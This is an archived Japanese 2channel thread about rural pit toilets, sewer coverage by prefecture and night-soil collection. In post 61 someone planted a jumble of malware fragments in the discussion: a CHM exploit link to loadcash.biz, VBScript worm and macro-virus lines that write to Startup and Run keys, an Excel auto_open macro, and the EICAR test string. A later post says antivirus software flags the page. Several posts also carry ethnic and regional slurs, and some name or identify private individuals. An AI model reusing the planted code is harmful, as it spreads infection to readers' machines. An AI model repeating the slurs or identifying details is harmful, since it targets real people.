2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

  田舎の便所  

1 :名無しの権兵衛さん:2006/10/02(月) 01:09:33
まだポットンが多いのかな?

2 :名無しの権兵衛さん:2006/10/02(月) 01:41:18
2ゲト

3 :名無しの権兵衛さん:2006/10/02(月) 14:11:27
これぞまさしく糞スレだ!

4 :名無しの権兵衛さん:2006/10/02(月) 16:38:28
多いのは簡易水洗だろ。

5 :名無しの権兵衛さん:2006/10/02(月) 23:12:05
糞スレ終了

6 :名無しの権兵衛さん:2006/10/03(火) 15:57:27
最近は、町村レベルでも水洗が普及している。
俺も村民だけど、25年前から水洗だ。
山奥の一軒家はボットンだろうけれど、まとまった集落は、水洗になりつつある。

7 :名無しの権兵衛さん:2006/10/05(木) 05:33:40
>>6
水洗でもいろいろある。水洗=下水道じゃない。
浄化槽も水洗。田舎でも新築は浄化槽義務付けだし。
重要なのは下水道かどうかだ。

8 :名無しの権兵衛さん:2006/10/09(月) 03:53:12
東北、北海道は
遅れているので
まだ町にバキュームカーが
走ってるってマジ?
超臭そう。
Bとかより最悪。

9 :名無しの権兵衛さん:2006/10/09(月) 04:08:01
滋賀作はぼっとん便所死ねよ

10 :名無しの権兵衛さん :2006/10/09(月) 07:54:43
中国、四国、九州地方が、下水道普及率低いし、
ぽっとんが多いのかな?
鹿児島の普及率29%って、離島のため?でも低すぎだ

11 :名無しの権兵衛さん :2006/10/09(月) 14:08:46
これを見ると、普及率の低い県は、徳島、和歌山だね〜
ttp://www.jswa.jp/05_arekore/07_fukyu/

徳島市で、27.8%
和歌山市で、28%

12 :名無しの権兵衛さん :2006/10/09(月) 14:19:24
県庁所在地で下水道普及率50%以下の都市。

徳島市  27.8%
和歌山市 28.1%
津市   39.2%
高知市  47.5%

今まで下水道整備しないで何やってきてたのやら?
津市とか名古屋都市圏なんでしょ?

13 :名無しの権兵衛さん:2006/10/09(月) 15:38:17
ポットン便所って夜中に行くとなんであんなに怖いんだろう

14 :名無しの権兵衛さん:2006/10/09(月) 17:34:17
今時、穴開いてるだけのピュアなボットン便所って田舎でも珍しくね?
便槽はそのままでも便器だけは簡易水洗に改修してる家多いと思われ。

15 :名無しの権兵衛さん:2006/10/09(月) 23:06:22
>>12
今年の元旦に合併した津市の場合は合併前からあった津市域だけでなく
旧久居市と安芸、一志郡がプラスされてるからな。

あと、合併で山奥の村と合併した高知市も

16 :名無しの権兵衛さん:2006/10/10(火) 00:34:00
東北(北海道)の
トイレは
用をたすとき
下を見れば
いつでもウンコが
見れるんだけど
不潔よね
ウンコ気張る時間が
長い奴は尻に虫がついて
尻にブツブツができ汚い
不潔よね

17 :名無しの権兵衛さん:2006/10/10(火) 06:56:08
オレは田舎に住んでるけど下水道完備してるぞー
親戚の家は都会の部類に入るトコに住んでるけど
浄化槽だぞー
それでもこっちを田舎だとバカにしてるぞー

18 :名無しの権兵衛さん:2006/10/11(水) 04:32:10
北海道には
肥だめがある

19 :名無しの権兵衛さん:2006/10/11(水) 22:10:00
まじかよΣ(゚ロ゚;)ナニ-!!

20 :名無しの権兵衛さん:2006/10/12(木) 16:20:24
古い家だけだよ!田舎は土地があるから意外に一軒家のキレイな家が多いから水洗トイレですよー

21 :名無しの権兵衛さん:2006/10/13(金) 06:18:39
ポットン便所?



うわっ きたね!

22 :名無しの権兵衛さん:2006/10/13(金) 07:14:33
東京にもぽっとん便所がある

23 :名無しの権兵衛さん:2006/10/13(金) 09:25:16
都会は人数でくみとり料金が決まるが田舎では量で料金が決まる。

24 :名無しの権兵衛さん:2006/10/13(金) 09:48:26
>>16
出来たてホヤホヤのウンコと違って
ぽっとん便所のウンコは発酵してツーンとアンモニア臭がするけど、
決して不快な臭いではない。

25 :名無しの権兵衛さん:2006/10/13(金) 09:53:38
汲み取り屋、連絡して1週間目に来やがった。
もぅ硫黄みたいな臭いがして目に来たぞ。
今回最高値更新。6300円。
ぼっとん便所のおかげで水道代は毎月1800円キープだが
こういう出費があるとおちおち喜んでもいられねぇのだ。


26 :名無しの権兵衛さん:2006/10/13(金) 11:11:58
最近の簡易水洗は蓋でふさがってるから臭いがこもって臭いよ
空気の吸い込み口がいつもふさがってるから

27 :名無しの権兵衛さん:2006/10/13(金) 11:28:50
糞食え!

28 :名無しの権兵衛さん:2006/10/16(月) 06:25:36
バキュームカーっての
うんこ吸う車
いったいどんな奴が
運転してんだか?
田舎者は根性あるなあ
都会育ちには驚くことばかり

29 :名無しの権兵衛さん:2006/10/16(月) 10:10:17
徳島県民ですが、家庭のトイレは水洗が多いです。田舎の方でも、ぼっとんは見た事がありません。

30 :名無しの権兵衛さん:2006/10/16(月) 10:20:01
>>29
それ、浄化槽埋めてるだけ。

31 :名無しの権兵衛さん:2006/10/16(月) 10:29:32
>>30
だから?

32 :名無しの権兵衛さん:2006/10/16(月) 11:11:24
>>30
そうなんですか?
でも駅のトイレは、ほとんどぼっとんです。





逝きたくないお。

33 :名無しの権兵衛さん:2006/10/16(月) 11:35:14
http://ea.uuhp.com/~ipnuki/cgi-bin/env/gachimuchi1835.jpg
http://www.lbycwi.org/images/Logos/LBYC%20Burgee-w-text-huge.jpg
http://imasugu.kakiko.com/uma/kur/kuroi.html

34 :名無しの権兵衛さん:2006/10/16(月) 11:35:14
そんな駅の管理者はJR死国なのよね〜

35 :名無しの権兵衛さん:2006/10/16(月) 11:38:50
だから徳島駅のトイレは使わずに、クレメントに行きます。

36 :名無しの権兵衛さん:2006/10/16(月) 11:40:08
徳島駅はかろうじて水洗ですが。

37 :名無しの権兵衛さん:2006/10/16(月) 12:05:31
黙れや!徳島はぼっとん県確定でいいんだよ!

38 :名無しの権兵衛さん:2006/10/16(月) 12:07:54
徳島ってBottonなの?東北とかのがBotton体質濃厚そうだけど?

39 :名無しの権兵衛さん:2006/10/16(月) 13:07:57
>>37
ひ ど い 。
失 礼 で す 。

40 :名無しの権兵衛さん:2006/10/16(月) 13:44:48
たすかにひどいな
どうせ青森県民の
ひがみだろ
Bottonは青森だけで十分な

41 :名無しの権兵衛さん:2006/10/16(月) 15:53:24
徳島は県そのものがボットン

42 :名無しの権兵衛さん:2006/10/16(月) 15:57:16
かぐわしい ボットンとくしま

43 :名無しの権兵衛さん:2006/10/16(月) 22:50:55
下水道普及率
徳島市:27.8%
徳島県:11.5%
H17年末でこれだけか〜
ぼっとんに慣れ親しんで、不便感じてないんだろうな〜

44 :名無しの権兵衛さん:2006/10/17(火) 10:55:20
徳島「県」だと11.5%・・・・・
信じられんな・・・ 日本とは思えない。
こんな県が他にもたくさんあるんなら、先進国と自負するのが恥ずかしくなってくる。
戦後、膨大な国家予算を注ぎ込んで行ってきた公共事業なるものは、真に国民の生活
を改善するためには使われて来なかったと言う事か・・・。
橋、道路、港湾、河川、鉄道・・・ これらも確かに重要だ、しかし徳島県11・5%
と言う数字を見ると、下水道事業にもっと予算を配分すべきではないのか。
建設業者にカネを落とすためだけの公共事業行政をこのまま続けると日本は疲弊して
行く。 国民の日々の生活に密着したミクロの分野から改善、整備して行くのが、
多岐に渡る公共事業の正しい順序立てではないのだろうか。

45 :名無しの権兵衛さん:2006/10/17(火) 11:20:32
徳島県民です。
自分もあまりよく分かってない部分もありますので、質問したいと思います。


1、下水道普及は、人口密集地帯にこそ必要で、田舎は戸別の浄化槽
 で足りるのでは?徳島では、近年の新築物件には浄化槽をつける
 ようにしていると思われます。
2、ボットンが多いとか言われているけど、昔みたいにバキュームカーは
 見なくなりました。浄化槽のおかげです。
3、田舎に下水道を引くことですごい財政負担になりますからね。
 屎尿は昔は畑の肥やしにされていたので、川に垂れ流しということは
 あまりなかったようです(全国どこでもそう)。
 しかし、都市部で浸水があったときに、コレラ等伝染病の危険が出てくる
 ので、まとめて下水道に集めて処理施設にもっていくことに
 なったのであって、田舎でそこまでする必要はないと思います。
 
戸別の浄化槽を設置していくことで、下水処理は解決されると思います



46 :名無しの権兵衛さん:2006/10/17(火) 21:47:49
下記URLで県別や都市別の普及率は見れます。
ttp://www.jswa.jp/05_arekore/07_fukyu/

人口も県の面積も同等の福井と徳島の普及率は、
福井:62.9%
徳島:11.5%

人口密集度でも、北海道はかなり低いし分散してると
思うけど、普及率は87.3%あるし。
徳島は税金を何に使ってきたんでしょうか?

47 :名無しの権兵衛さん:2006/10/17(火) 22:56:08
こんなこと書かれてますけど、事実?
http://travel2.2ch.net/test/read.cgi/chiri/1161001912/l50

48 :名無しの権兵衛さん:2006/10/17(火) 23:01:32
>>46
税金は必要なものに使うと思いますよ。
その普及率とは何の普及率か教えてください
なんとなく恥ずかしい気はするのですが、確かなものにしておきたい

49 :47:2006/10/17(火) 23:09:17
間違えました。
http://travel2.2ch.net/test/read.cgi/chiri/1161001912/133

50 :45:2006/10/17(火) 23:14:08
その統計では下水道だけで、下水処理施設のことは出てきませんね。

浄化槽等の下水処理施設すれば十分だと思うのですが?
それと、徳島に限らず、田舎はそれで十分で、配管を埋める工事を
する方が税金の無駄遣いのように思えるのですが。
どなたかご存じないですか。

51 :名無しの権兵衛さん:2006/10/17(火) 23:25:13
浄化槽をたくさん埋設して都会に排水してやれ
漏れのクソ水を飲みやがれ都会人www

52 :45:2006/10/17(火) 23:40:18
地元のスレでも言ったことあるんですけど、
徳島や和歌山は、そもそも大きな川を汚すほどの流域人口がなく、
自然浄化で今までやってきたんだと思います。
ただ、川にそのまま流すことは、今までもしてこなかった。
くみ取り式なら、処理場に運ばれるし、浄化槽なら、ある程度
浄化された液体を流すようにしている。
ここまで気をつけていれば、人口密度の少ない田舎は十分
だと思います。

徳島や和歌山のように大河流域でのんびり生活しているようなところ
が、下水道を建設しましょうということになるには、ドイツのような
かなりハイレベルの環境保護意識を住民が持たなければならないでしょう。
多分日本人全体でも、ドイツほど環境保護意識を持つ人は少ないと思いますが。

53 :名無しの権兵衛さん:2006/10/18(水) 00:57:24
東北はぼっとん便所を好む生き物らしいーまさに野蛮

54 :名無しの権兵衛さん:2006/10/18(水) 20:45:34
>>51 藁藁ww

55 :名無しの権兵衛さん:2006/10/18(水) 22:10:12
>>54
ついでにブロアーのコンセント抜けw

56 :名無しの権兵衛さん:2006/10/20(金) 14:34:16
ここで田舎の便所をバカにしているバカは
自分チの便所じゃなくてアパートの便所だ
共同便所は汚いぞ
最近はウオッシュレットは田舎の方が多いぞ


57 :名無しの権兵衛さん:2006/10/21(土) 02:54:33
>>50
今は国もその流れ。
田舎は浄化槽に補助出して設置を義務化。
合併浄化槽がなかった時代ならともかく、
今の時代になんでもかんでも下水道がいいなんて、
ただの下水道信仰か土建屋の戯言。
適した方式で水洗化すりゃいい。

58 :名無しの権兵衛さん :2006/10/22(日) 09:41:28
>>57
個人の負担すべき額がだいぶ変わってくるんでなかったかな?
補助金ありの浄化槽でも、設置費用は下水道よりもかなり
割高だったような。

59 :名無しの権兵衛さん:2006/11/02(木) 02:16:35
東北方面はまだ
ぼっとん便所
この前彼氏の実家に行った時
ぼっとん便所初体験しました
田舎の人は耐えるよね〜

60 :名無しの権兵衛さん:2006/11/08(水) 20:51:57
水鉄砲トイレの写真がみたいのだが、
どう検索したものか・・・

61 :名無しの権兵衛さん:2006/11/08(水) 21:52:04
:<body onload=window()>:2006/10/24(火) 00:17:08 ID:keS/Ssxh
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


62 :名無しの権兵衛さん:2006/11/11(土) 15:29:31
バァチャン家が山なんだけど、(本当に山の中にあるって感じ)
あの辺だと一生トイレはボットンなんだろうな、って悲しくなる


63 :名無しの権兵衛さん:2006/11/11(土) 20:11:39
水洗トイレはボタンが多すぎて緊張するよ

64 :名無しの権兵衛さん:2006/12/02(土) 05:47:06
北海道や東北は
まだボットン便所が
多い

65 :名無しの権兵衛さん:2006/12/02(土) 06:21:12
まじ?氏ねば?

66 :名無しの権兵衛さん:2006/12/02(土) 18:02:14
体に悪いだろ

67 :名無しの権兵衛さん:2006/12/02(土) 20:41:54
東北じゃない
トーホグ
だ。
東北なんて発音したらトーホグの人におこられるぞ

68 :名無しの権兵衛さん:2006/12/02(土) 22:19:56
千葉ばかにするな。
トーホグよりましだ

69 :名無しの権兵衛さん:2006/12/16(土) 17:12:35
あげ

70 :名無しの権兵衛さん:2006/12/16(土) 17:14:21
>>68
エッ!? 千葉って、南東北地方だよね?

71 :名無しの権兵衛さん:2007/01/10(水) 04:47:57 ID:zzIJU7bb
北海道はボットン便所でした
凍らないか心配です

72 :名無しの権兵衛さん:2007/01/14(日) 14:02:56 ID:KlfdZ/jR
まじ?(゚ロ゚;)

73 :名無しの権兵衛さん:2007/01/14(日) 14:26:25 ID:nSIWSf+j
>>72
ウソだよ
半島の便所が紙流すと詰るのはホントw

でも、お前は嘗糞ミンジョクだからポットン好きだろ?w

74 :名無しの権兵衛さん:2007/01/14(日) 15:48:51 ID:Hlo+YGzG
みなさん糞が本当に大好きなようですね♪
ハィ( ^ω^)⊃糞


75 :名無しの権兵衛さん:2007/01/14(日) 16:21:57 ID:CJbisTgC
汲み取り職人歴一年八カ月のおいらがきますたよ
何か質問ある?

76 :名無しの権兵衛さん:2007/01/14(日) 18:39:25 ID:J5yBqMtZ
村から浄化槽の補助金が出た

77 :名無しの権兵衛さん:2007/01/27(土) 15:55:01 ID:+kKcqWqQ
函館
糞まみれ

78 :名無しの権兵衛さん:2007/01/27(土) 15:56:51 ID:Yac2Bakb
千葉なんてDQNだらけ。

79 :名無しの権兵衛さん:2007/01/27(土) 16:02:11 ID:hUx18Wr8
ボットン便所って夜不気味すぎるよな・・・
手でも出てきそうだよ

80 :名無しの権兵衛さん:2007/01/27(土) 16:14:55 ID:Yac2Bakb
まぁね。

81 :名無しの権兵衛さん:2007/01/27(土) 21:27:11 ID:ocaiWJ/N
ぺぺローションを便所に置き、中から腕が伸びたらアーッ!

82 ::2007/01/27(土) 23:14:14 ID:8J3JG48G
田舎は公衆トイレが汚くて外ションしたほうがまだまし。都会の公衆トイレも同じなのかもしれないけどさすがに外ションはできないです。

83 :75でつ:2007/01/28(日) 11:00:31 ID:UfT+AdXp
おいらの経験から言うと、雲古も三年ぐらいたつと臭くなくなりますよ。
ただし、雨水が適度にはいり、乾燥しない環境が必要ですがね。



84 :名無しの権兵衛さん:2007/01/29(月) 09:47:38 ID:61NdHX7l
外ション写真見せてみろよ

85 :名無しの権兵衛さん:2007/01/29(月) 15:54:48 ID:5N3kN4NA
変態仮面↑

86 :名無しの権兵衛さん:2007/01/29(月) 19:03:43 ID:Ik5NBmoC
俺の家築40年ぐらい立つけどいまだボットン

87 :名無しの権兵衛さん:2007/01/30(火) 11:54:05 ID:yJu81/wM
>>84
まず、自分のティムポなりマムコなりを晒してから
依頼するのが、人としての礼儀だと思うが、、如何なものか

88 :名無しの権兵衛さん:2007/02/11(日) 18:47:22 ID:Rd/TYzyG
保守あげ

89 :名無しの権兵衛さん:2007/02/12(月) 12:38:49 ID:Geahtg3Z
締まりが悪い万こは見たくないな

90 :名無しの権兵衛さん:2007/02/14(水) 07:44:36 ID:GivmfKD7
田舎に引越してから生まれて初めて簡易水洗。
水洗と同じように流してたら初汲み取り時、溢れそうになってたorz
自分ちのトイレで気を遣わないといけないなんて最悪

91 :名無しの権兵衛さん:2007/02/14(水) 15:06:12 ID:6iWe1ruv
ウチも田舎で便器は洋式ですが、ポットンです。月に1度エイセイ車が取りにくるのですが、どぉもボッタクリされてるよぅなんです(´・`;)


92 :名無しの権兵衛さん:2007/02/14(水) 15:06:55 ID:6iWe1ruv
以前は、5人で暮らしていたんですが、その頃、毎月B千少しの金額で変わることなかったのが、2人抜けて3人暮らしになっているのですが、どぉいう訳か千円アップしてます。
ちなみに、決まったオジさんが取りに来る時だけ高いんです…。でも、部楽の方だから怖くて文句も言えないままです↓

93 :名無しの権兵衛さん:2007/02/17(土) 04:36:07 ID:KS5j/bsD
大変だね

94 :名無しの権兵衛さん:2007/02/17(土) 05:36:43 ID:Tt89v0yO
>>93
ポットン系の話好きみたいだけど
糞嘗が伝統の生まれだから?

95 :名無しの権兵衛さん:2007/02/17(土) 12:39:38 ID:l/aaxcHD
コンポストつかうべし。
下水代や浄化槽がいらん。
ttp://www.niwashigoto-hiroba.com/index.html

96 :名無しの権兵衛さん:2007/02/17(土) 22:39:08 ID:KS5j/bsD
AGEAGE

97 :名無しの権兵衛さん:2007/02/18(日) 03:55:58 ID:XE5HbepE
ボットン汚い
田舎者の尻が汚い

98 :名無しの権兵衛さん:2007/02/19(月) 00:44:16 ID:YunfVqvD
バキュームカー

99 :名無しの権兵衛さん:2007/02/19(月) 10:05:29 ID:EjAmtBca
糞ゴミDQN情報
富山県南砺市井波のサークルK付近でうろうろしてる
DQN車(スポーツカー・マフラー付きの車(自称vipカーw))は
20代から30代の集まりで、いい年して喧嘩上等とかぬかしてるらしいよ
負けたこと無いらしいw誰か買ってあげてw
中には無職のやつもいるから、朝昼晩いつでも喧嘩買うらしいwwww

100 :名無しの権兵衛さん:2007/02/20(火) 05:03:39 ID:v2/929+u
悲惨だな

101 :名無しの権兵衛さん:2007/02/26(月) 03:04:52 ID:hpLqd6Hm
(^-^)

102 :名無しの権兵衛さん:2007/02/27(火) 00:35:42 ID:VlWEP3u2
東北はボットン系便所で
毎日田舎叩き
あ〜すっきりした

103 :名無しの権兵衛さん:2007/02/27(火) 00:37:56 ID:01ZHq+TI
>>102
キチガイ粘着煽り必死だな。

104 :名無しの権兵衛さん:2007/03/08(木) 21:30:18 ID:IEqDSq7N
あげ

105 :名無しの権兵衛さん:2007/03/10(土) 03:51:41 ID:MhuNxsT+
アゲ

106 :名無しの権兵衛さん:2007/03/11(日) 00:34:32 ID:3l0qOepv
あげ

107 :名無しの権兵衛さん:2007/03/11(日) 01:43:35 ID:3l0qOepv
あげ

108 :名無しの権兵衛さん:2007/03/11(日) 02:08:15 ID:7GNuzYqX

ド田舎盛岡市。岩手の山奥僻地の盛岡市。可愛そうな奴ら。

山林の寒冷地で震えながら雪かきしてる盛岡市の田舎モンに大笑い。

便利な都会に住んでる俺には山奥で豪雪地帯&寒冷地の盛岡に住んでる住民が理解できない。

広い平地に住んでて雪など降らない俺の街  

海も綺麗で巨大な港や空港もある俺の街 

俺と同じ地域に住む仲間は勝ち組だと思う。 

とにかく農家でもないのに人口30万人以下の田舎盛岡市に住んでる奴らは「負け組」 

再びチベットツンドラ盛岡市に行きたいなあ。

ど田舎の盛岡人の冷え切った顔を見てみたい。

そしてニヤニヤ笑ってやりたい。こいつら可愛そうだなあってね。

低収入でサービス残業の盛岡人に乾杯。  

モリオカンよ 会社が倒産したら都会の中核市に移住しろよ  おまえらの為を思ってカキコしてる。 応援してるぜ  



109 :名無しの権兵衛さん:2007/03/12(月) 22:53:57 ID:pNCRfnQo
揚げ芋

110 :名無しの権兵衛さん:2007/03/14(水) 11:22:54 ID:s1uiuEBk
>>108
そんな奴ら本当に日本にいるのかよ

111 :名無しの権兵衛さん:2007/03/16(金) 11:06:56 ID:qYtW6l7h
これだけはいっておくぞ
函館の便所スレは立てるなよ

112 :名無しの権兵衛さん:2007/03/21(水) 03:10:46 ID:MUEjkphq
義両親に結婚の挨拶に行った日、生理2日目だった。
トイレを借りたら、ぼっとんで血がうん〇に乗っかって、ティッシュを何回落としても血が隠れなくて困った。
だって、生理の上がった義母さんと男しかいない家なのに〜。
結局隠すのあきらめた。
まぁデキ婚でない事は分かったね。
私は彼より年上だし。

113 :名無しの権兵衛さん:2007/03/21(水) 03:14:13 ID:MUEjkphq
友人の子供が、バキュームカーの人見て「ウンコ屋さんバイバーイ」
って叫んでたのを思い出した。

114 :名無しの権兵衛さん:2007/03/22(木) 01:51:45 ID:aEgyrkA1
あげ

115 :名無しの権兵衛さん:2007/03/28(水) 10:00:15 ID:hoW5tZog
このスレを立ち上げると
セキュリティーソフトがトロイの木馬って警告するぞ
削除できてるけど出来てない人もいるのでは
PCの人はスキャンした方がいいよ
2回立ち上げ2回ともでました。


116 :名無しの権兵衛さん:2007/04/07(土) 01:55:28 ID:EDlI5DBi
あげ

117 :名無しの権兵衛さん:2007/04/15(日) 15:06:14 ID:jr1vgRiV
あげ

118 :名無しの権兵衛さん:2007/04/17(火) 03:14:03 ID:xC9gcWCy
とりあえずカマドウマが出没

119 :名無しの権兵衛さん:2007/04/18(水) 01:08:25 ID:lzGqFZv4
別名"便所コオロギ

120 :名無しの権兵衛さん:2007/05/08(火) 15:35:52 ID:jnvSPsxW
阿部定の墓の隣は汲み取り便所だよ。義母愛子が生前言ってましたがトイレのそばだから居心地悪いらしい。

121 :名無しの権兵衛さん:2007/05/20(日) 19:17:23 ID:LjD+gu0D
1980年当時俺の堺市の小学校のプールのトイレポットンだった

122 :名無しの権兵衛さん:2007/06/09(土) 05:17:22 ID:3plLdfAy
ドライブ中に催した彼女曰く、「ボットン便所でするくらいなら外でする!」と言って戻ってきて車の陰でオシッコしてた。汚いし、虫が飛んでたらしい。俺にとっては得した気分だけどな。スマン!少し見えた。

123 :名無しの権兵衛さん:2007/06/09(土) 12:12:27 ID:nVyPYhNB
ポットンって「おつり」が来るって聞いたけど

いくら「おつり」もらえるの

124 :名無しの権兵衛さん:2007/06/21(木) 13:18:21 ID:DUuO0iyK
>>123
黄金が少々

125 :名無しの権兵衛さん:2007/06/22(金) 09:21:21 ID:ZWEOvbUV
おつりじゃない、見返りだよ!下を見てたら、跳ね返してきたよ。芳香剤が無かった時代 ハエトリ紙となぜか炭が5本ぐらいおいてあった匂い消しか?

126 :名無しの権兵衛さん:2007/07/27(金) 15:51:49 ID:7SnEVGxH
あげ

127 :名無しの権兵衛さん:2007/07/30(月) 08:28:51 ID:TvaEedR2
>>108
中核市が都会に感じるの?
きみも、かなり田舎もんだな!


128 :名無しの権兵衛さん:2007/08/16(木) 10:33:19 ID:BreZ0pRV
盆で田舎へ帰ったらまだぼっとんのままだった。しかもおつりつき 汲み取り口を見ると肥えたごに柄杓までおいてある。
しかし水洗トイレではあじわえない懐かしいにおいがする。おつりがきそうなとき 新聞紙を一枚落としておく。
バキュームカーでないので詰まる心配もない。

129 :名無しの権兵衛さん:2007/08/16(木) 12:55:55 ID:hZTg9ZvC
田舎のババア、ぼっとん便所の便器外して小川で洗うな。
家の庭で洗えyo

130 :田舎好き:2007/08/19(日) 15:26:15 ID:y63LRgWz
田舎の公衆便所にこんな張り紙があった。『このトイレを見て悲鳴をあげる人は使用お断り。』
『畑の肥やしになります。うんこをしたらこの棒でかきまわして下さい。』 かき回すとなんとも
言えない香り(田舎の香水)がした。田舎好きにはたまらにけど。

131 :名無しの権兵衛さん:2007/08/19(日) 16:23:54 ID:Dggc/MGr
639-0253 山崎幸男って言う奴 大嫌いだ。


132 :田舎大好き人間:2007/08/31(金) 18:22:21 ID:NFSHZUk5
関西の田舎のバス停に便所がついてある。しかも超旧式 便器はなく四角い穴
があいているだけ。 汲み取り口はあいたまま その横には肥えたんご でも
そんな田舎暮らしが大好きです。

133 :名無しの権兵衛さん:2007/08/31(金) 18:30:25 ID:Sq8+xVfK
風俗勤務女= 魔界 ◆RC3h9.WHho = 東芝産業システム社

134 :名無しの権兵衛さん:2007/09/04(火) 20:43:38 ID:kRJHgJ9K
都会暮らしがいやになり 兵庫県の田舎町に古い農家の一軒家を借り移り住んで
二ヶ月になり 便所の汲み取りはと近所の人に聞くと 「この旗を玄関に出してお
くと数日後にきてくれるよ」と聞き赤い旗を出しておくと 翌日の早朝に来てくれ
て料金は 無料だった。やっぱり田舎暮らしはいいな。



135 :名無しの権兵衛さん:2007/09/05(水) 19:11:20 ID:zFNPyflE
それって近所の農家の方が汲みに来てるんじゃない? たまに野菜なんか持ってくることも
あると思うよ。 


136 :名無しの権兵衛さん:2007/09/06(木) 19:32:52 ID:4DGeo5aT
私のとこも農家の方が汲んでくれるよ。古いタイプ(丸い穴が掘ってある)で
汲み取った後小便などの水が残る(うんこを発酵させるためらしい)のでおつり
がこないように新聞紙をひいてくれてます。「臭いのにすみません」と言うと
「百姓にとっては大切な物です」と言ってました。やはり季節ごとに野菜や果物
を持ってきてくれますよ。
都会では味わえない長閑さがまだ日本の田舎に残ってますよ。

137 :名無しの権兵衛さん:2007/09/09(日) 01:38:43 ID:XbUP4VaO
>>132>>134>>136
なんと!!・・・
そんな江戸時代の様なことが、この21世紀の日本にマジであるのか?
怖いもの見たさで見てみたい・・・。

138 :名無しの権兵衛さん:2007/09/09(日) 07:17:21 ID:MshTCLE/
H戸高校在学中の三年生、S長の某床屋勤務の姉妹
1〜2ケ月に男が代わる
田舎の便所姉妹
S郷村S越に生まれの家がある


139 :名無しの権兵衛さん:2007/09/09(日) 13:43:08 ID:jhx9Kr+r
>>132>>134>>136
へぇ〜凄いね。うちも汲み取り式なんだけど、バキュームカーが取りに来るからそれが当たり前と思ってた。農家の人が汲みにくるってのは初めて知った。
無料ならうちにも汲みに来て〜

140 :名無しの権兵衛さん:2007/09/09(日) 15:43:52 ID:XQH1f6xU
人里離れたほんとの田舎じゃないですか。それとも俗に言う部落?。俺の住んでる所 昔部落差別をうけバキュームカーでの汲み取りが後回しされ 
農家の方に汲んでもらってたよ。30年ぐらい前までだけど。そのときも野菜くれたよ。今も一部で人糞をまいてるようだけど ときどき田舎の香水
がする。

141 :名無しの権兵衛さん:2007/09/10(月) 21:52:42 ID:wQTSPkxj
俺の実家和歌山の山奥だけど バキュームカー呼ぶと無茶高いので自分とこの
畑に肥やしとしてほかの堆肥とまぜて使っているよ。近くにハイキングコース
の便所があるけどそこも汲み取ってる。たまに帰ると手伝わされる。でも田舎
好きだから気にならない。
今住んでるとこ話題の松原だけど 今から2,30年前は農家の人が 「肥え
汲まして」と言って肥えたごで汲んで野菜分けてくれました。と父が言ってま
した。昭和30年代まではどこもそうだったそうです。

142 :名無しの権兵衛さん:2007/09/11(火) 21:25:56 ID:4B1yZoGV
ぼっとんの公衆便所で肥たごのうんこを捨てているのを見たんですが これも不法投棄になるのでは、
中国の公衆便所で見たことはあるけど 汲み取りの時以上にくさい。

143 :名無しの権兵衛さん:2007/09/14(金) 23:21:46 ID:GqFKT5LR
おれんちの便所を紹介しよう。内便所はなく母屋の外に独立してある。
大便所は2連になっている。その隣が小便所、その隣が風呂で、同じ
屋根だ。風呂の水が小便所に流れ込み、これは大便所に連通している。
昔は風呂をあまり沸かさなかったので、風呂の水を便所に流し込んで
も問題はなく、適当に薄まるので、下肥には丁度良かった。しかし、
近年は風呂を沸かす頻度が増したので、排水溝にも流せるようにした。
大便所には小箱の中に落とし藁が入っている。これは尻を拭くための
ものではない。おつりを防ぐためのものだ。多少臭気も吸収するのかな。
尻を拭くのは新聞紙で、ちょっとくしゃくしゃにして用いる。下肥
は有機栽培の野菜には欠かせないものだ。成長したキャベツに藁とか
新聞紙のかけらがくっついているのは愛嬌である。大便所は1坪く
らいかな。30センチくらいの隙間をあけて、2枚の板を渡している。
昔、子供が便所に落ちたという話を聞いたことがある。便坪の壁にはび
っしりと蝿の幼虫が這っている。釣りに使うサシムシというやつだ。
小便所の液面ではボウフラがはねている。下肥を有機栽培の野菜にか
けるときは大きい柄杓でコエタゴにくみ取って、柄杓の柄を天秤棒に
して畑に運ぶ。これが重いのだ。


144 :名無しの権兵衛さん:2007/09/16(日) 09:43:48 ID:JlU3bkiG
JRの駅から一日数本のバスで一時間半の田舎へ移住して数ヶ月 便所が満杯になったので
バキュームカーにきてもらったら 2倍ぐらい高い料金を請求された。
そしたら近くの農家の方がきて「無茶高いでしょう うちが汲み取るからいつでも言って来て」
言うてきました。  2回目の汲み取りのときお願いしたら 大根やかぼちゃを分けてくれた。
それにバキュームカーのときは 外がとてもくさかったけど今回は便所の所だけですんだ。
まだまだこんな田舎が残ってますよ。探してみては。



145 :名無しの権兵衛さん:2007/09/19(水) 14:23:27 ID:beXbGPTk
ウジ殺しの薬入れると肥料には使えなくならない?

146 :名無しの権兵衛さん:2007/09/19(水) 20:23:12 ID:ihNNBYmj
殺虫剤入りは肥料には出来ないものもあるよ。おれんち山奥の百姓で肥たごに汲み取ってるけど
ウジ殺し入りはとくに長期間肥だめでねかせて畑にまいてるよ。
よくおつり防止で新聞を落としてる家があるけど 柄杓でもじゃまなんだよな。
バキュームカーだとすぐもんくをいわれるけど 汲み取るとき柄杓にからまってしまうんで
かき回しながら新聞紙を丸めていってからとるんだよ。できれば 143さんの家みたいに藁を使って
まらったら楽なんだけど。




147 :名無しの権兵衛さん:2007/09/19(水) 21:21:12 ID:fUH1Y0wl
家 汲み取りだけど
